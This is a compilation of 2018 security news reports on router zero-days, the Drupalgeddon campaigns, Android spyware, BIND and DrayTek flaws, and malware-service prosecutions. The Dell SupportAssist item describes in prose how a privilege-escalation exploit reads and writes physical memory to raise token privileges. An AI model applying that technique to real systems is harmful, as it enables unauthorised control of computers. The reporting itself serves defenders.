Researchers from security firm Qihoo 360 Netlab reported that cybercriminals are continuing to target the Dasan GPON routers, they recently spotted threat actors using another new zero-day flaw affecting the same routers and recruit them in their botnet.

At the time of writing, there aren’t further details on the vulnerabilities exploited by attackers in the wild, Qihoo 360 Netlab experts only confirmed that the exploit code they tested worked on two models of GPON routers.

The security firm has refused to release further details on this flaw to prevent more attacks but said it was able to reproduce its effects.

Experts discovered the operators behind the TheMoon botnet are now leveraging the zero-day exploit to target GPON routers. The activity of the TheMoon botnet was first spotted in 2014, and since 2017 its operators added to the code of the bot at least 6 IoT device exploits.

“A very special thing about this round is the attacking payload. It is different from all previous ones, so it looks like a 0day.” reads the analysis published by Netlab.

“And we tested this payload on two different versions of GPON home router, all work. All these make TheMoon totally different, and we chose NOT to disclose the attack payload details.”

GPON routers

TheMoon isn’t only the last botnet targeting Dasan GPON routers, in a previous analysis shared by Netlab, the experts confirmed that Hajime, Mettle, Mirai, Muhstik, and Satori botnets have been exploiting the CVE-2018-10561 and CVE-2018-10562 exploits for the same models.

Netlab along with other security firms have managed to take down the C&C servers of the Muhstik botnet.

Despite a large number of GPON routers is exposed online only 240,000 have been compromised, likely because the exploit code used by the attackers was not able to properly infect the devices.

Experts warn that the number of infected GPON routers could rapidly increase if the zero-day vulnerability will be exploited by other threat actors.


Dell Patches Vulnerability in Pre-installed SupportAssist Utility
21.5.2018 securityweek 
Vulnerebility

Dell Patches Local Privilege Escalation in SupportAssist

Dell recently addressed a local privilege escalation (LPE) vulnerability in SupportAssist, a tool pre-installed on most of all new Dell devices running Windows.

The security issue resides in a kernel driver the tool loads, Bryan Alexander, the security researcher who discovered the issue, reveals. The Dell SupportAssist tool is mainly used to troubleshoot issues and offer support to both the user and Dell.

The vulnerability can be abused to bypass driver signature enforcement (DSE) ad infinitum, the researcher says. The driver, he explains, exposes a lot of functionality, providing “capabilities for reading and writing the model-specific register (MSR), resetting the 1394 bus, and reading/writing CMOS.”

The impacted driver is first loaded when SupportAssist is launched (filename pcdsrvc_x64.pkms or pcdsrvc.pkms, depending on architecture). Although used by Dell, the driver is built by PC-Doctor, a company that offers “system health solutions” to computer makers such as Dell, Intel, Yokogawa, IBM, and others.

“Once the driver is loaded, it exposes a symlink to the device at PCDSRVC{3B54B31B-D06B6431-06020200}_0 which is writable by unprivileged users on the system. This allows us to trigger one of the many IOCTLs exposed by the driver; approximately 30,” the researcher explains.

Alexander also found a DLL used by the userland agent that also worked as an interface to the kernel driver and had symbol names available. Further analysis revealed a MemDriver class that allow userland services to read and write arbitrary physical addresses.

For that, however, the driver must be ‘unlocked’ to start processing control codes. To unlock it, one would simply need to send a system call (ioctl) containing the proper code. Next, the driver sets a global flag and “will process control codes for the lifetime of the system,” the researcher notes.

To exploit the issue, one can start reading physical memory looking for process pool tags, then identify a target process and a SYSTEM process, and then steal the token.

“However, PCD appears to give us a shortcut via getPhysicalAddress ioctl. If this does indeed return the physical address of a given virtual address (VA), we can simply find the physical of our VA and enable a couple token privileges using the writePhysicalMemory ioctl,” the researcher notes.

The issue, nevertheless, is that only usermode addresses can be resolved this way, as the MmProbeAndLockPages call is passing in UserMode for the KPROCESSOR_MODE.

Even so, one could still read chunks of physical memory, and the researcher used that to toggle on SeDebugPrivilege for the current process token (which requires “finding the token in memory and writing a few bytes at a field offset”).

Once the physical address of the token has been identified, the researcher triggered two separate writes at the Enabled and Default fields of a _TOKEN. The researcher published the source code of the bug on GitHub.

The vulnerability was reported to Dell in early April, but a patched version of SupportAssist was only released last week.


Utimaco to Acquire Atalla Hardware Security Module Business From Micro Focus
21.5.2018 securityweek  Security

Aachen, Germany-based firm Utimaco will acquire the Atalla hardware security module (HSM) and enterprise secure key manager (ESKM) lines from UK-based Micro Focus.

Announced on Friday, the financial details of the transaction were not disclosed. The deal is expected to complete by September 2018, subject to regulatory approval.

Both Utimaco and Atalla have been in the HSM business for around thirty years. Utimaco, the world's second largest supplier, has focused on general purpose HSMs sold via OEMs and the channel. Atalla has particular strengths in the financial services market, with access to top brand banking and financial services players, especially in the USA, UK and Asia.

"Both Utimaco and Atalla are pioneers in hardware security modules, the combination of which leads to an unrivalled wealth of experience and know-how," said Malte Pollmann, Utimaco’s CEO. "The acquisition of Atalla will mark a key milestone in the further implementation of our growth strategy. It is complementary in terms of product portfolio and regional footprint as well as the vertical markets we are addressing."

"As two of the leading pioneers in the hardware security modules business, Atalla and Utimaco are a perfect match, operating in complementary markets with aligned strengths that will help drive better alignment for customers and position Atalla for future growth,” said John Delk, general manager of security for Micro Focus."

Utimaco says it will maintain the existing Atalla team and further invest at Atalla's Sunnyvale, CA, location.

HSMs are specially hardened devices used to house and protect digital keys and signatures. Atalla's HSM is a payments hardware security module for protecting sensitive data and associated keys for non-cash retail payment transactions, cardholder authentication, and cryptographic keys.

The ESKM line provides a centralized key management hardware-based solution for unifying and automating an organization’s encryption key controls by creating, protecting, serving, and auditing access to encryption keys.

Micro Focus acquired Atalla after HPE CEO Meg Whitman announced, in September 2016, that it would be spun out and then merged with Micro Focus.

Utimaco was acquired by Sophos in 2009. One year later, Sophos sold a majority interest to Apax Partners, and this was followed by a management buyout in 2013. Today, Utimaco's primary investors are EQT, PINOVA Capital and BIP Investment Partners S.A.


Researcher Earns $36,000 for Google App Engine Flaws
21.5.2018 securityweek 
Vulnerebility

An 18-year-old researcher has earned more than $36,000 from Google after finding a critical remote code execution vulnerability related to the Google App Engine.

Part of the Google Cloud offering, the App Engine is a framework that allows users to develop and host web applications on a fully managed serverless platform.

In February, Ezequiel Pereira, a student from Uruguay, managed to gain access to a non-production Google App Engine development environment. Once he obtained access, he discovered that he could use some of Google’s internal APIs.

Pereira did not notice anything that appeared dangerous before his first report through Google’s Vulnerability Reward Program (VRP), but his findings were assigned a P1 priority rating, which indicates that the issue needs to be addressed quickly as it may impact a large percentage of users.

After looking around more, the researcher did come across some interesting methods and submitted a second report to Google. Following the second report, the tech giant escalated the issue and advised Pereira to stop his tests as he might “easily break something using these internal APIs.”

Google’s own analysis of the security holes led to the determination that they could have been exploited for remote code execution “due to the way Google works.”

Google awarded the researcher a total of $36,337 for his findings, including $5,000 for a less severe issue. The first report was sent to the company on February 25 and a patch was rolled out sometime between March 6 and March 13, Pereira said.

The expert has published a blog post detailing his findings and his interactions with Google.

This was not the first time Pereira discovered serious vulnerabilities in Google services. In the past few years, he earned thousands of dollars through the VRP.

Bug bounty hunters often push their tests to the limit due to concerns that the vendor might downplay their findings if they don’t clearly demonstrate the impact of a vulnerability. However, at least in Pereira’s case, Google does appear to have calculated bug bounty payouts based on full potential impact. In the past, the expert earned up to $10,000 for weaknesses that initially did not appear to be worth much in terms of a bug bounty.


Critical Flaws Patched in Phoenix Contact Industrial Switches
21.5.2018 securityweek  ICS

Several vulnerabilities, including ones rated critical and high severity, have been patched in industrial ethernet switches made by Phoenix Contact, a Germany-based company that specializes in industrial automation, connectivity and interface solutions.

The vulnerabilities, described in advisories published recently by ICS-CERT and its German counterpart CERT@VDE, can be exploited remotely to cause a denial-of-service (DoS) condition, execute arbitrary code, and gain access to potentially sensitive information.

The security holes, discovered by researchers at Positive Technologies, impact Phoenix Contact FL SWITCH 3xxx, 4xxx, 48xx series devices running firmware versions 1.0 through 1.33. The flaws have been patched by the vendor with the release of version 1.34.Several vulnerabilities patched in Phoenix Contact industrial switches

The most serious of the vulnerabilities, based on its CVSS score of 9.1, is CVE-2018-10730, which allows an attacker who has permission to transfer configuration files to/from the switch or permission to upgrade the firmware to execute arbitrary OS shell commands.

“CGI applications config_transfer.cgi and software_update.cgi are prone to OS command injection through targeted manipulation of their web-request headers,” CERT@VDE said in an advisory. “If the vulnerability is exploited, the attacker may create their own executable files that could further exploit the integrity of the managed FL SWITCH. For example, the attacker may deny switch network access.”

The second most serious issue, with a CVSS score of 9.0, is CVE-2018-10731. This flaw, caused by a stack-based buffer overflow, can be exploited to gain unauthorized access to the device’s OS files and inject executable code.

Another stack-based buffer overflow affecting FL SWITCH products is CVE-2018-10728, which can be exploited for DoS attacks and executing arbitrary code. An attacker can leverage this flaw to disable Web and Telnet services, CERT@VDE warned.

Several vulnerabilities patched in Phoenix Contact industrial switches

The last vulnerability patched by Phoenix Contact in its industrial switches is a medium severity weakness that allows an unauthenticated attacker to read the content of a device’s configuration file.

This is not the first time researchers from Positive Technologies have found vulnerabilities in switches from Phoenix Contact. In January, ICS-CERT and CERT@VDE disclosed flaws that could have been exploited to gain full control of affected devices and possibly interrupt operations in the ICS network.

Researchers said at the time that they had not found any of these switches connected directly to the Internet and noted that these devices are typically used for internal PLC networks.


Android Malware Targets North Korean Deflectors
21.5.2018 securityweek  Android

Recent attacks orchestrated by a hacking group referred to as “Sun Team” have targeted North Korean deflectors via malicious applications in the Google Play store, McAfee reports.

Referred to as RedDawn, this is the second campaign attributed to the group this year, but is the first to abuse the legitimate Google Play storefront for malware distribution. In January, the security firm revealed that North Korean deflectors and journalists were being targeted via social networks, email, and chat apps.

McAfee’s security researchers found the malware uploaded on Google Play as ‘unreleased’ versions and reports that only around 100 infections occurred via the application marketplace. Google has already removed the malicious programs.

Once installed, the malware starts copying sensitive information from the device, including personal photos, contacts, and SMS messages, and then sends them to the threat actors.

McAfee found that the hackers managed to upload three applications to Google Play – based on the email accounts and Android devices used in the previous attack. The apps include Food Ingredients Info, Fast AppLock, and AppLockFree. They stayed in Google Play for about 2 months before being removed.

Food Ingredients Info and Fast AppLock can “secretly steal device information and receive commands and additional executable (.dex) files from a cloud control server. We believe that these apps are multi-staged, with several components,” McAfee reports.

AppLockFree, on the other hand, appears to be part of the reconnaissance stage, setting the foundation for additional malware. The malicious programs would “spread to friends, asking them to install the apps and offer feedback via a Facebook account with a fake profile” that promoted Food Ingredients Info.

“After infecting a device, the malware uses Dropbox and Yandex to upload data and issue commands, including additional plug-in dex files; this is a similar tactic to earlier Sun Team attacks. From these cloud storage sites, we found information logs from the same test Android devices that Sun Team used for the malware campaign we reported in January,” McAfee reports.

The logs have a similar format and use the same abbreviations as in other logs previously associated with Sun Team. Furthermore, the hackers used already known Sun Team email addresses for the malware’s developer.

The group’s malware has been active since 2017 and went through multiple versions since. The hackers continue to focus on extracting information from infected devices (they only use spyware).

The same as in previous attacks, the new malware showed the use of Korean words and the Dropbox account naming used a similar pattern of celebrity names. This suggests that the actors are not native South Korean, but familiar with the culture and language.

The researchers also discovered that the Android devices the attackers tested their malware on are “manufactured in several countries and carry installed Korean apps.” Exploit code found in a cloud storage revealed modified “versions of publicly available sandbox escape, privilege escalation, code execution exploits” with added functions to drop custom Trojans on infected devices.

“The modified exploits suggest that the attackers are not skillful enough to find zero days and write their own exploits. However, it is likely just a matter of time before they start to exploit vulnerabilities,” the researchers note.

The Sun Team hackers were observed creating fake accounts using photos from social networks and the identities of South Koreans. In addition to stealing identities, the hackers are using texting and calling services to generate virtual phone numbers that allow them to sign up for online services in South Korea.


Attackers Change DNS Settings of DrayTek Routers
21.5.2018 securityweek 
Attack

Attackers have been targeting a zero-day vulnerability in routers made by DrayTek to change their DNS settings and likely abuse them in future attacks.

The Taiwan-based manufacturer of broadband Customer Premises Equipment (CPE) has already acknowledged the problem and has issued a firmware update to address it.

According to the company, the security vulnerability impacts the web administration feature, allowing for an attacker “to intercept or create an administration session and change settings on your router.”

Checking whether a device has been hit is quite easy, as it would show a different DNS server than the one set by the user (or the default blank). The attackers are changing the DNS settings to at least one rogue server, 38[.]134[.]121[.]95, an IP located on the network of China Telecom.

The altering of DNS settings on routers is likely the initial phase of a larger attack, where users would be redirected to rogue DNS servers and fake websites. Thus, cybercriminals can harvest usernames and passwords, steal sensitive information such as banking credentials, or serve malicious applications to unsuspecting users.

“Shodan shows there are nearly 800,000 Draytek routers worldwide, so the vulnerability provides a big opportunity for malicious redirections which could result in people and businesses losing credentials, data and ultimately money,” Sion Lloyd, Researcher at Nominet, told SecurityWeek in an emailed comment.

“Given DNS is basically the underlying protocol that directs traffic around the internet, it often enjoys certain privileges on the corporate firewall. Attackers know this, which is why it is often seen as a weak spot and hijacked and abused,” Lloyd continued.

The rogue address observed on impacted DrayTek routers is not responding to DNS queries, suggesting that the attackers might have not activated the server yet, or took it offline. The issue might not be visible on affected devices if the hackers set a secondary (legitimate) address as a fallback.

Researchers who noticed the altered DNS settings on DrayTek suggest that the attackers indeed used an exploit and didn’t abuse default login credentials. The manufacturer hasn’t provided specific details on the targeted issue, but apparently did confirm that a zero-day was being abused.

DrayTek has issued a couple of advisories to inform users on the flaw, and one of them also contains a list of all impacted router models and the updated firmware versions released for them.

The company also notes that, in addition to the router’s DNS and DHCP settings, users should also check the settings for each subnet, if the router supports multiple LAN subnets. The attackers might have also disabled the DHCP server on affected routers, which should cause errors on LAN, thus making the issue more obvious.

“Specific improvements have been identified as necessary to combat this and we are in the process of producing and issuing new firmware. You should install that as soon as possible,” DrayTek says.

Users who have been compromised are advised to restore a configuration backup or manually correct all settings. They are also advised to change the admin password, check whether other admin users have been added, and disable remote access to the router, unless it is needed.

“The best defense against this type of attack is always to make sure you have the latest firmware installed; note that similar attacks on other devices have used default passwords - so changing these is also advised. Connected hardware is constantly being picked apart by attackers, so monitoring security alerts and patching the holes they discover is crucial,” Lloyd said.

Additionally, keeping an eye on monitoring DNS traffic could help organizations understand whether requests are redirected to rogue servers or are resolving at the intended host.

“Monitoring DNS traffic for anomalies or behavioral changes, as well as comparing it against known bad identifiers, can provide a useful way for security teams to stop this kind of attack occurring before it is a problem. There is also a mechanism to validate that a DNS response is correct, known as DNSSEC. Owners of valuable domains can use this to make it possible to spot when a DNS response has been altered, although in the case where your DNS server is compromised this may not help,” Lloyd pointed out.


Roaming Mantis gang evolves and broadens its operations
21.5.2018 securityaffairs   Android

Roaming Mantis malware initially targeting Android devices, now has broadened both its geographic range and its targets.
Security experts from Kaspersky Lab discovered that the operators behind the Roaming Mantis campaign continue to improve their malware broadening their targets, their geographic range and their functional scope.

Roaming Mantis surfaced in March 2018 when hacked routers in Japan redirecting users to compromised websites. Investigation by Kaspersky Lab indicates that the attack was targeting users in Asia with fake websites customized for English, Korean, Simplified Chinese and Japanese. Most impacted users were in Bangladesh, Japan, and South Korea.

“Our research revealed that the malware (sic) contains Android application IDs for popular mobile banking and game applications in South Korea. The malware is most prevalent in South Korea, and Korean is the first language targeted in HTML and test.dex. Based on our findings, it appears the malicious app was originally distributed to South Korean targets. Support was then added for Traditional Chinese, English, and Japanese, broadening its target base in the Asian region.”

The dreaded DNS hijacking malware was originally designed to steal users’ login credentials and the secret code for two-factor authentication from Android devices, it has evolved and recently was spotted targeting iOS devices as well as desktop users.

“In April 2018, Kaspersky Lab published a blog post titled ‘Roaming Mantis uses DNS hijacking to infect Android smartphones’. Roaming Mantis uses Android malware which is designed to spread via DNS hijacking and targets Android devices.” reads the analysis published by Kaspersky.

“In May, while monitoring Roaming Mantis, aka MoqHao and XLoader, we observed significant changes in their M.O. The group’s activity expanded geographically and they broadened their attack/evasion methods. Their landing pages and malicious apk files now support 27 languages covering Europe and the Middle East. In addition, the criminals added a phishing option for iOS devices, and crypto-mining capabilities for the PC.”

Operators behind the Roaming Mantis malware recently added the support for 27 languages to broaden their operations.

The versions of the Roaming Mantis malware continue to be spread via DNS hijacking, attackers used rogue websites to serve fake apps infected with banking malware to Android users, phishing sites to iOS users, and redirect users to websites hosting cryptocurrency mining script.

To evade detection, malicious websites used in the campaign generate new packages in real time.

“Aside from the filename, we also observed that all the downloaded malicious apk files are unique due to package generation in real time as of May 16, 2018.It seems the actor added automatic generation of apk per download to avoid blacklisting by file hashes.” continues the analysis.
“This is a new feature. According to our monitoring, the apk samples downloaded on May 8, 2018 were all the same.”

According to Kaspersky, the recent malicious apk now implements 19 backdoor commands, including the new one “ping” and sendSms, setWifi, gcont, lock, onRecordAction, call, get_apps,

Owners of iOS devices are redirected to a phishing site (http://security[.]apple[.]com/) that mimics the Apple website in the attempt of stealing user credentials and financial data (user ID, password, card number, card expiration date and CVV number).

Roaming Mantis

The Roaming Mantis operators have recently started targeting PC platforms, users are redirected to websites running the Coinhive web miner scripts.

The level of sophistication of the operations conducted by the Roaming Mantis gang and the rapid growth of the campaign lead the researchers into believing that the group has a strong financial motivation and is well-funded.

“The evasion techniques used by Roaming Mantis have also become more sophisticated. Several examples of recent additions described in this post include a new method of retrieving the C2 by using the email POP protocol, server side dynamic auto-generation of changing apk file/filenames, and the inclusion of an additional command to potentially assist in identifying research environments, have all been added.” concludes Kaspersky.
“The rapid growth of the campaign implies that those behind it have a strong financial motivation and are probably well-funded.”

Further details, including IoCs are available in the report published by Kaspersky.


Internet Systems Consortium rolled out security updates to address 2 flaws in BIND DNS Software
21.5.2018 securityaffairs 
Vulnerebility

On Friday, the Internet Systems Consortium (ISC) announced security updates for BIND DNS software that address two vulnerabilities rated with a “medium” severity rating.
Both vulnerabilities could be exploited by attackers to cause a denial-of-service (DoS) condition, the first issue tracked as CVE-2018-5737 can also cause severe operational problems such as degradation of the service.

“A problem with the implementation of the new serve-stale feature in BIND 9.12 can lead to an assertion failure in rbtdb.c, even when stale-answer-enable is off. Additionally, problematic interaction between the serve-stale feature and NSEC aggressive negative caching can in some cases cause undesirable behavior from named, such as a recursion loop or excessive logging.” reads the security advisory published by the ISC.

“Deliberate exploitation of this condition could cause operational problems depending on the particular manifestation — either degradation or denial of service.”

The flaw affects BIND 9.12.0 and 9.12.1 which permit recursion to clients and which have the max-stale-ttl parameter set to a non-zero value are at risk.

The Internet Systems Consortium (ISC) has addressed the flaw with the release of BIND 9.12.1-P2. Below the workaround provided by the organization:

Setting “max-stale–ttl 0;” in named.conf will prevent exploitation of this vulnerability (but will effectively disable the serve-stale feature.)
Setting “stale-answer enable off;” is not sufficient to prevent exploitation, max-stale-ttl needs to be set to zero.
BIND DNS sw flaw

The second flaw tracked as CVE-2018-5736 is remotely exploitable if the attacker can trigger a zone transfer.

“An error in zone database reference counting can lead to an assertion failure if a server which is running an affected version of BIND attempts several transfers of a slave zone in quick succession,” states the advisory published by the ISC.

“This defect could be deliberately exercised by an attacker who is permitted to cause a vulnerable server to initiate zone transfers (for example: by sending valid NOTIFY messages), causing the named process to exit after failing the assertion test.”

The CVE-2018-5736 flaw affects BIND 9.12.0 and 9.12.1, the ISC addressed it with the release of the version 9.12.1-P1. Experts noticed that admins need to update to version 9.12.1-P2 because version 9.12.1-P1 was affected by a problem.

This is the third time that the ISC provides security updates for BIND software this year. The first updates were released in January to address a high severity vulnerability that could cause DNS servers crash,

The second updates were released in February to address remotely exploitable vulnerabilities in DHCP.


Hacked Drupal sites involved in mining campaigns, RATs distributions, scams
21.5.2018 securityaffairs  
Virus

Crooks are exploiting known vulnerabilities in the popular Drupal CMS such as Drupalgeddon2 and Drupalgeddon3 to deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.
Security experts at Malwarebytes reported that compromised Drupal websites are used to deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.

Crooks are exploiting known vulnerabilities in the popular Drupal CMS such as Drupalgeddon2 and Drupalgeddon3 to deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.

The two remote code execution security vulnerabilities, tracked as CVE-2018-7600 and CVE-2018-7602 have been already fixed by Drupal developers.

At the end of March, the Drupal Security Team confirmed that a “highly critical” vulnerability (dubbed Drupalgeddon2), tracked as CVE-2018-7600, was affecting Drupal 7 and 8 core and announced the availability of security updates on March 28th.

The vulnerability was discovered by the Drupal developers Jasper Mattsson.

Both Drupal 8.3.x and 8.4.x are no more supported, but due to the severity of the flaw, the Drupal Security Team decided to address it with specific security updates and experts called it Drupalgeddon2.

The development team released the security update in time to address CVE-2018-7600.

After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes,” experts started observing bad actors attempting to exploit the flaw.

A week after the release of the security update, the experts at security firm Check Point along with Drupal experts at Dofinity analyzed the CMS to analyzed the Drupalgeddon2 vulnerability and published a technical report on the flaw.

After the publication of the report. the expert Vitalii Rudnykh shared a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes.”

Immediately after the disclosure of the PoC, security experts started observing bad actors attempting to exploit the flaw.

Other security firms observed threat actors have started exploiting the flaw to install malware on the vulnerable websites, mainly cryptocurrency miners.

The experts at the SANS Internet Storm Center reported several attacks delivering a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl.

At the end of April, the Drupal team fixed a new highly critical remote code execution issue (dubbed Drupalgeddon 3) tracked as CVE-2018-7602 with the release of versions 7.59, 8.4.8 and 8.5.3.

Also in this case, cybercriminals started exploiting the CVE-2018-7602 to hijack servers and install cryptocurrency miners.

The experts from Malwarebytes conducted an analysis of attacks involving Drupalgeddon2 and Drupalgeddon3 and discovered that most of the compromised Drupal sites had been running version 7.5.x, while roughly 30 percent had been running version 7.3.x, which was last updated in August 2015.

“Almost half the sites we flagged as compromised were running Drupal version 7.5.x, while version 7.3.x still represented about 30 percent, a fairly high number considering it was last updated in August 2015. Many security flaws have been discovered (and exploited) since then.” reads the analysis published by Malwarebytes.

Drupal hacked websites

More than 80 percent of the compromised websites had been web cryptocurrency miners, Coinhive injections remain by far the most popular choice, followed by public or private Monero pools.

“We collected different types of code injection, from simple and clear text to long obfuscated blurbs. It’s worth noting that in many cases the code is dynamic—most likely a technique to evade detection,” continues the report.

Roughly 12 percent of the attacks delivered RATs or password stealers disguised as web browser updates, while Tech support scams accounted for nearly 7 percent of the client-side attacks.


Google awarded a young expert a total of $36,337 for an RCE in the Google App Engine
21.5.2018 securityaffairs  
Vulnerebility

Google awarded the 18-year-old student Ezequiel Pereira a total of $36,337 for the discovery of a critical remote code execution vulnerability that affected the Google App Engine.
The Google App Engine is a framework that allows Google users to develop and host web applications on a fully managed serverless platform.

In February, Pereira gained access to a non-production Google App Engine development environment, then he discovered that it was possible to use some of Google’s internal APIs.

Pereira ethically reported the issue through the Google’s Vulnerability Reward Program (VRP). The experts at Google ranked the flaw as a P1 priority, a level that is assigned to vulnerabilities that could have a significant impact on a large number of users and that for this reason must be addressed as soon as possible.

Meantime Pereira continued his test and submitted a second report to Google after discovering further issues, then Google invited Pereira to stop his activities due to the risk to “easily break something using these internal APIs.”

Google security team discovered that the flaw reported by the youngster could led to remote code execution.

Google App Engine

Pereira published a detailed analysis of its finding after Google has fixed them and awarded him.

“In early 2018 I got access to a non-production Google App Engine deployment environment, where I could use internal APIs and it was considered as Remote Code Execution due to the way Google works. Thanks to this I got a reward of $36,337 as part of Google Vulnerability Rewards Program.” reads the blog post published by the researcher.

“Some time ago, I noticed every Google App Engine (GAE) application replied to every HTTP request with a “X-Cloud-Trace-Context” header, so I assumed any website returning that header is probably running on GAE.
Thanks to that, I learned “appengine.google.com” itself runs on GAE, but it can perform some actions that cannot be done anywhere else and common user applications cannot perform, so I tried to discover how was it able to do those actions.
Obviously, it has to make use of some API, interface or something only available to applications ran by Google itself, but maybe there was a way to access them, and I looked for that.”

Below the timeline for the flaw:

February 2018: Issue found
February 25th, 2018: Initial report (Only the “
stubby
” API)
March 4th and 5th, 2018: The “
app_config_service
” API discovered and reported
March between 6th and 13th, 2018: The access to non-prod GAE environments was blocked with a 429 error page
March 13th, 2018: Reward of $36,337 issued
May 16th, 2018: Issue confirmed as fixed


Hacked Drupal Sites Deliver Miners, RATs, Scams
20.5.2018 securityweek 
Virus

The Drupal websites hacked by cybercriminals using the vulnerabilities known as Drupalgeddon2 and Drupalgeddon3 deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.

Two highly critical flaws were patched in recent months in the Drupal content management system (CMS). The security holes are tracked as CVE-2018-7600 and CVE-2018-7602, and they both allow remote code execution.

Malicious actors started exploiting CVE-2018-7600, dubbed Drupalgeddon2, roughly two weeks after a patch was released and shortly after a proof-of-concept (PoC) exploit was made public.

CVE-2018-7602, dubbed Drupalgeddon 3, was discovered during an analysis of CVE-2018-7600 by the Drupal Security Team and developer Jasper Mattsson, who also reported the original vulnerability. Hackers started exploiting CVE-2018-7602 immediately after the release of a patch.

Cybercriminals have exploited the vulnerabilities to hijack servers and abuse them for cryptocurrency mining. Some websites have been targeted by botnets known to also be involved in distributed denial-of-service (DDoS) attacks.

Researchers at security firm Malwarebytes recently conducted an analysis of client-side attacks involving Drupalgeddon2 and Drupalgeddon3, i.e. the threats pushed by the compromised sites to their visitors.

Experts noticed that nearly half of the hacked Drupal sites had been running version 7.5.x of the CMS, while roughly 30 percent had been running version 7.3.x, which was last updated in August 2015.

Unsurprisingly, more than 80 percent of the hacked sites had been serving cryptocurrency miners, mostly through Coinhive injections.

“We collected different types of code injection, from simple and clear text to long obfuscated blurbs. It’s worth noting that in many cases the code is dynamic—most likely a technique to evade detection,” researchers said in a blog post.

Hacker plant cryptocurrency miner on university site via Drupal vulnerability

Just over 12 percent of the attacks observed by Malwarebytes delivered RATs or password stealers disguised as web browser updates.

Tech support scams accounted for nearly 7 percent of the client-side attacks spotted by the security firm. In these attacks, website visitors are typically redirected to a page that locks their browser and instructs them to call a “tech support” number.

Malwarebytes says it has notified the organizations whose websites have been compromised.


Two Vulnerabilities Patched in BIND DNS Software
20.5.2018 securityweek 
Vulnerebility

Updates announced on Friday by the Internet Systems Consortium (ISC) for BIND, the most widely used Domain Name System (DNS) software, patch a couple of vulnerabilities.

While attackers may be able to exploit both of the flaws remotely for denial-of-service (DoS) attacks, the security holes have been assigned only a “medium” severity rating.

One of the vulnerabilities, tracked as CVE-2018-5737, can allow a remote attacker to cause operational problems, including degradation of the service or a DoS condition.

“A problem with the implementation of the new serve-stale feature in BIND 9.12 can lead to an assertion failure in rbtdb.c, even when stale-answer-enable is off,” ISC explained in an advisory. “Additionally, problematic interaction between the serve-stale feature and NSEC aggressive negative caching can in some cases cause undesirable behavior from named, such as a recursion loop or excessive logging.”

The vulnerability impacts BIND 9.12.0 and 9.12.1 if the server is configured to allow recursion to clients and the max-stale-ttl parameter has a value other than zero. The issue has been patched in BIND 9.12.1-P2, but workarounds are also available.

The second flaw, CVE-2018-5736, is also remotely exploitable, but only if the attacker can trigger a zone transfer.

“An error in zone database reference counting can lead to an assertion failure if a server which is running an affected version of BIND attempts several transfers of a slave zone in quick succession,” ISC wrote. “This defect could be deliberately exercised by an attacker who is permitted to cause a vulnerable server to initiate zone transfers (for example: by sending valid NOTIFY messages), causing the named process to exit after failing the assertion test.”

This vulnerability impacts BIND 9.12.0 and 9.12.1, and it has been patched in version 9.12.1-P1. However, users need to update to version 9.12.1-P2 as version 9.12.1-P1 was recalled before the public announcement due to a defect.

ISC support customers, including OEMs that re-package the organization’s open source code into commercial products, were notified about these vulnerabilities on May 9.

The latest version of BIND also includes a security improvement related to update-policy rules. ISC also noted that “named will now log a warning if the old root DNSSEC key is explicitly configured and has not been updated.”

This is the third round of security updates released for BIND this year. The first was released in mid-January and the second in late February. The February update impacted BIND Supported Preview Edition, but not any publicly released versions.


Judges convict crook of operating Scan4You Counter Antivirus Service
20.5.2018 securityaffairs Crime

Crook faces up to 35 years in prison for operating the popular Scan4You counter anti-virus (CAV) website that helped malware authors to test the evasion capabilities of their codes.
Scan4You is a familiar service for malware developers that used it as a counter anti-virus (CAV).

Scan4You allowed vxers to check their malware against as many as 40 antivirus solutions.

scan4you

Scan4You was probably the largest counter anti-virus website, it went offline in May 2017 after authorities arrested two men in Latvia, the Russian national Jurijs Martisevs (36) (aka “Garrik”) and Ruslans Bondars (37) (aka “Borland”).

Both suspects were extradited by the FBI to the United States.

Jurijs Martisevs was traveling to Latvia when he was arrested by authorities and in March he pleaded guilty in a Virginia court to charges of conspiracy and aiding and abetting computer intrusion.

On Wednesday, Bondars was found guilty of conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to commit wire fraud, and computer intrusion with intent to cause damage.

“Ruslans Bondars helped hackers test and improve the malware they then used to inflict hundreds of millions of dollars in losses on American companies and consumers,” said John P. Cronan, Acting Assistant Attorney General of the Justice Department’s Criminal Division.

“Today’s verdict should serve as a warning to those who aid and abet criminal hackers: the Criminal Division and our law enforcement partners consider you to be just as culpable as the hackers whose crimes you enable—and we will work tirelessly to identify you, prosecute you, and seek stiff sentences that reflect the seriousness of your crimes.”

Bondars faces a maximum penalty of 35 years in prison when sentenced on September 21, 2018.

Scan4You was launched in 2009 with the intent to offer a service that helped malware developers to check evasion capabilities of their code.

For a monthly fee, malware authors could upload their samples to the service that test their evasion capabilities against a broad range of anti-virus products.

The service is similar to the legitimate VirusTotal with the difference that Scan4You did not share submissions with the security community.

“Scan4you differed from legitimate antivirus scanning services in multiple ways. For example, while legitimate scanning services share data about uploaded files with the antivirus community and notify their users that they will do so, Scan4you instead informed its users that they could upload files anonymously and promised not to share information about the uploaded files with the antivirus community.” continues the DoJ.

According to the DoJ, crooks used Scan4You’s services to test the infamous Citadel malware that was used in the cyber attack against the retail giant Target.

Even if Scan4You was taken offline, crooks have other ways to test their malware before spreading them in the wild. Law enforcement must remain vigilant to prevent the growth of other similar services.


Chrome evolves security indicators by marking with a red warning for HTTP content
20.5.2018 securityaffairs Security

Starting with Chrome 70, Google will mark with a red warning for HTTP content, Big G is continuing its effort to make the web more secure.
Since January 2017, Chrome indicates connection security with an icon in the address bar labeling HTTP connections to sites as non-secure, while since May 2017 Google is marking newly registered sites that serve login pages or password input fields over HTTP as not secure.

Back to the present, in May 2018 the overall encrypted traffic for several Google products is more than over 93%.

“Security is a top priority at Google. We are investing and working to make sure that our sites and services provide modern HTTPS by default. Our goal is to achieve 100% encryption across our products and services. The chart below shows how we’re doing across Google.” reads the Google Transparency report.

This is an important success for Google, consider that early 2014 only 50% of the traffic was encrypted.

According to the Google Transparency report, around 75% of the pages loaded via Chrome early May 2018 were served over secure HTTPS connections, while in 2014 the percentage was only around 40%.

Given now plan to mark unencrypted connections with a red “Not Secure” warning.

